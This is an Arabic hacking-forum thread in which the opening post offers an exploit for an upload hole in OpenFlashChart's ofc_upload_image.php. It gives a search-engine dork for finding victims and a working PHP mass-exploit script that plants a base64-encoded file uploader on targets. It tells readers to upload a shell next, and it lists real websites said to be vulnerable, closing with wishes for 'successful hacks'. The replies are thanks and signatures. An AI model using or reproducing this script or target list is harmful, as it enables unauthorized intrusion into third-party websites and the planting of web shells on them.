حصريا على جيوش الهكرز Remote Code Execution

حصريا على جيوش الهكرز Remote Code Execution


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: حصريا على جيوش الهكرز Remote Code Execution

  1. #1

    Hasri حصريا على جيوش الهكرز Remote Code Execution




    السلام عليكم ورحمة الله وبركاته
    الحمد لله والصلاة والسلام على رسول الله ، وعلى آله وصحبه ومن اتبع هداه ، أما بعد :



    من إكتشافي: ثغرة Remote Code Execution في العديد من السكربتات


    الشـــرح


    نضع الدرك في محرك البحث google

    كود:
    intitle:Index of /tmp-upload-images/
    أنا إخترت هذا الموقع (مسار التخزين المؤقت للصور)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/tmp-upload-images/


    نذهب لهذا المسار (مسار التحميل)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php
    تظهر لنا هذه الرسالة لتؤكد لنا أن الموقع مصاب

    كود:
    Saving your image to: ../tmp-upload-images/


    نضع هذه المسارات في السكربت php التالي

    كود:
    <form method='POST'>
    <center>
    <input type='text' name='name' value='cyb.php'>
    <input type='submit' value='OK' name='OK'><br><br>
    <textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
    </center>
    </form>
    <?
            @set_time_limit(0);
            $site = explode("\r\n", $_POST['situs']);
            $namafile = $_POST['name'];
            $path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');
             
            $nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");
             
            $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgfCBjeWIucGhwPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBzdWNjZXNzISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgZmFpbGVkICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
             
            $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
            $context = stream_context_create($options);
             
            if($_POST['OK'])
            {
                    foreach($site as $situs)
                    {
                            foreach($path as $upload)
                            {
                                    $fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
                            }
                            foreach($nama as $namas)
                            {
                                    $url = "{$situs}{$namas}{$namafile}";
                                    $check = @file_get_contents($url);
                                    if(eregi("cyb.php", $check))
                                    {
                                            echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
                                            flush();
                                    }
                            }
                    }
            }
            echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
    ?>


    نستعرض هذا السكربت على سرفر شخصي أو على سرفر سبق إختراقه



    نضع رابط الموقع في المستطيل كما في الصورة ثم نضغط OK فنتحصل على رابط ملف التحميل cyb.php



    نستعرض الملف cyb.php ثم نرفع الشل في نفس المسار





    هذه بعض المواقع مصابة يمكن تطبيق الثغرة عليها

    http://web.kdz.eu/sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/
    http://www.hastingsvoluntaryaction.o...upload-images/
    http://www.webstatus.designvault.co....upload-images/
    http://www.adcc.asn.au/main/administ...upload-images/


    ختاما، أتمنى لكم إختراقات موفقة

    ردودكم تهمني

    التعديل الأخير تم بواسطة Cyb3Rm0uJah3D ; 11-21-2013 الساعة 12:13 AM

  2. #2

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    شكرا جزيلااا

  3. #3

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    مشكور للطرح
    واصل ابداعك
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



  4. #4

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    والله بطل مشكور

    ✔™Verified Account™✔
    ││█║▌║▌ █ ║▌│█│║▌
    skype belal.root

    my facebook: fb.com/palastenian.ghost
    fb.com/jor.ghost

    my website: http://jordanghost.webs.com/

  5. #5

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution


    لا اله الا الله محمد رسول الله




  6. #6

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    بطل مشاء الله عليك فى تقدم اخى



    boda@hackers

  7. #7

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    مشكووووووووووور

  8. #8

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    شكراااااااا على الطرح واصل ...
    (¯`*•.¸,¤°´'`°¤,¸.•*´¯)
    ¸,¤°´'`°•.¸O¸.•°´'`°¤,¸
    ஐ◄█▓▒░جيوش الهكرز░▒▓█►ஐ
    【•سُبْحَانَ اللَّهِ وَبِحَمْدِهِ ،•، سُبْحَانَ اللَّه الْعَظِيم•】
    00•●●•00

    استغفر الله العظيم
    اللهم لك الحمد حمدا كثيرا طيبا مباركا فيه
    اشهد أن لا إلة إلأ الله وحده لاشريك لة وأشهد ان محمد عبده ورسوله


  9. #9
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    بارك الله فيك اخي مبدع

  10. #10

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    lمشاء الله عليك روعه يبطل
    الشر خالي وانا ابن اخته ^_^

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. CiviCRM for Joomla 4.2.2 - Remote Code Injection
    بواسطة موآدع في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 04-26-2013, 01:48 PM
  2. phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها
    بواسطة Ace في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 11-06-2011, 08:41 PM
  3. ثغرة remote command execution
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-25-2010, 07:39 PM
  4. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 05:43 AM
  5. Remote Command Execution
    بواسطة الهكر المجهول في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-22-2010, 10:06 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •